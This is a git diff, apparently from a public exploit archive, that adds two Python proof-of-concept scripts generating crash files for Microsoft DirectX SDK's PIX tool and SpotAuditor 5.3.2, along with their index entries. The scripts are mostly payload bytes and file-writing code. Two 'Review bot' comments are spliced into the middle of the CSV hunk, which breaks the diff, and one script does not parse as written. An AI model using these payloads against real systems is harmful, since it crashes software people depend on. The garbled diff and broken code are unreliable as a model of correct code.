diff --git a/exploits/windows/dos/47718.py b/exploits/windows/dos/47718.py
new file mode 100755
index 000000000..a15b1b24f
--- /dev/null
+++ b/exploits/windows/dos/47718.py
@@ -0,0 +1,48 @@
+#Exploit Title: Microsoft DirectX SDK 2010 - '.PIXrun' Denial Of Service (PoC)
+#Exploit Author : ZwX
+#Exploit Date: 2019-11-26
+#Vendor Homepage : https://www.microsoft.com/
+#Link Software : https://www.microsoft.com/en-us/download/details.aspx?id=681
+#Tested on OS: Windows 7
+
+Proof of Concept (PoC):
+=======================
+
+1.Download and install Microsoft DirectX SDK
+2.Open the PIX for Windows tools
+2.Run the python operating script that will create a file (poc.PIXrun)
+3.Run the software "File -> Open File -> Add the file (.PIXrun) "
+4.PIX for Windows Crashed
+
+#!/usr/bin/python
+
+DoS=("\x2E\x73\x6E\x64\x00\x00\x01\x18\x00\x00\x42\xDC\x00\x00\x00\x01"
+"\x00\x00\x1F\x40\x00\x00\x00\x00\x69\x61\x70\x65\x74\x75\x73\x2E"
+"\x61\x75\x00\x20\x22\x69\x61\x70\x65\x74\x75\x73\x2E\x61\x75\x22"
+"\x40\x4f\x73\x61\x6e\x64\x61\x4d\x61\x6c\x69\x74\x68\x00\x00\x00"
+"\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x74\x41\x41\x41\x41\x41\x41"
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+"\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41")
+
+poc = DoS
+file = open("poc.PIXrun,"w")
+file.write(poc)
+file.close()
+
+print "POC Created by ZwX"
\ No newline at end of file
diff --git a/exploits/windows/dos/47719.py b/exploits/windows/dos/47719.py
new file mode 100755
index 000000000..b8baf33f7
--- /dev/null
+++ b/exploits/windows/dos/47719.py
@@ -0,0 +1,31 @@
+#Exploit Title: SpotAuditor 5.3.2 - 'Base64' Denial Of Service (PoC)
+#Exploit Author : ZwX
+#Exploit Date: 2019-11-26
+#Vendor Homepage : http://www.nsauditor.com/
+#Link Software : http://spotauditor.nsauditor.com/downloads/spotauditor_setup.exe
+#Tested on OS: Windows 7
+
+
+'''
+Proof of Concept (PoC):
+=======================
+
+1.Download and install SpotAuditor
+2.Run the python operating script that will create a file (poc.txt)
+3.Run the software "Tools -> Base64 Encrypted Password
+4.Copy and paste the characters in the file (poc.txt)
+5.Paste the characters in the field 'Base64 Encrypted Password' and click on 'Decrypt'
+6.SpotAuditor Crashed
+'''
+#!/usr/bin/python
+
+http = "http//"
+buffer = "\x41" * 2000
+
+
+poc = http + buffer
+file = open("poc.txt","w")
+file.write(poc)
+file.close()
+
+print "POC Created by ZwX"
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 612098bb4..e447311c8 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
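Review bot: 47718.py does not parse as Python as added: `open("poc.PIXrun,"w")` is missing the closing quote after the filename, and the "Proof of Concept (PoC):" steps are bare text rather than a comment or string (47719.py in the same commit wraps its steps in `'''`). Wrap the steps in a docstring and open the output as `file = open("poc.PIXrun", "wb")`, since the payload is raw bytes, not text. The file is added with mode 100755, but `#!/usr/bin/python` is not its first line and so is never honoured, and `print "POC Created by ZwX"` is Python 2 only; both points also apply to 47719.py. The embedded bytes spell `.snd`, `iapetus.au` and `@OsandaMalith`, which suggests the sample was adapted from another file; a comment recording its origin and the observed fault (module, exception code) would help anyone triaging the crash.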
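Review bot: In 47719.py, `http = "http//"` has no colon, and nothing in the entry says whether that is deliberate or a typo for `http://`; a one-line comment stating which property of the input the 'Decrypt' field mishandles would let a maintainer confirm a vendor fix. `file` and `buffer` both rebind Python 2 builtins (`file` is rebound in 47718.py as well), and the handle is closed by hand; `with open("poc.txt", "w") as out: out.write(poc)` closes it even if the write fails. Step 3 of the docstring opens a double quote that is never closed, and steps 4 and 5 both describe the paste.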
@@ -6609,6 +6609,8 @@ id,file,description,date,author,type,platform,port
 47711,exploits/windows/dos/47711.py,"InTouch Machine Edition 8.1 SP1 - 'Atributos' Denial of Service (PoC)",2019-11-25,chuyreds,dos,windows,
 47716,exploits/ios/dos/47716.py,"iNetTools for iOS 8.20 - 'Whois' Denial of Service (PoC)",2019-11-26,"Ivan Marmolejo",dos,ios,
 47717,exploits/windows/dos/47717.py,"InduSoft Web Studio 8.1 SP1 - _Atributos_ Denial of Service (PoC)",2019-11-26,chuyreds,dos,windows,
+47718,exploits/windows/dos/47718.py,"Microsoft DirectX SDK 2010 - '.PIXrun' Denial Of Service (PoC)",2019-11-27,ZwX,dos,windows,
+47719,exploits/windows/dos/47719.py,"SpotAuditor 5.3.2 - 'Base64' Denial Of Service (PoC)",2019-11-27,ZwX,dos,windows,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,